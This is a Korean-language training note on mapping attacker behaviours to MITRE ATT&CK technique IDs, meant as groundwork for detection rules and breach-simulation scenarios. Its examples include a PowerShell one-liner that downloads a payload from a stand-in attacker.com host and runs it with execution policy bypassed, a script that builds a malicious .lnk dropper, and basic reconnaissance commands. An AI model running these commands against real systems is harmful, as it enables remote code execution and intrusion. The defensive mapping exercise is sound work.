1. 공격 흐름 분석 및 문서화

  1. 공격/행위 파악 – 스크립트나 명령어가 실제로 무슨 일을 하는지 이해
  2. 전술(Tactic) 식별 – 공격자가 왜 하는지 목적 찾기
  3. 기술(Technique) 매칭 – MITRE ATT&CK 사이트에서 해당 행위를 찾고 ID 부여
  4. 하위 기술(Sub-technique) 여부 확인 – 더 구체적인 실행 방법이 있으면 지정
  5. 표로 기록 – 나중에 탐지 룰, BAS 시나리오 작성에 쓰기

2. 예시 실습 + 매핑

예시 1 — PowerShell로 원격 파일 다운로드

# 원격 파일 다운로드 후 실행
Invoke-WebRequest -Uri "<http://attacker.com/payload.ps1>" -OutFile "$env:TEMP\\payload.ps1"
Start-Process powershell -ArgumentList "-ExecutionPolicy Bypass -File $env:TEMP\\payload.ps1"

매핑

행위 전술(Tactic) Technique ID 기술명
PowerShell 명령 실행 Execution T1059.001 Command and Scripting Interpreter: PowerShell
원격 리소스 다운로드 Command & Control T1105 Ingress Tool Transfer

예시 2 — .lnk 드로퍼 생성

# 악성 바로가기 생성
$WshShell = New-Object -ComObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut("$env:USERPROFILE\\Desktop\\evil.lnk")
$Shortcut.TargetPath = "powershell.exe"
$Shortcut.Arguments = "-ExecutionPolicy Bypass -File C:\\payload.ps1"
$Shortcut.Save()

매핑

전술 Technique ID 기술명
악성 .lnk 파일 생성 Initial Access T1204.002 User Execution: Malicious File

예시 3 — 시스템 정보 수집

whoami
hostname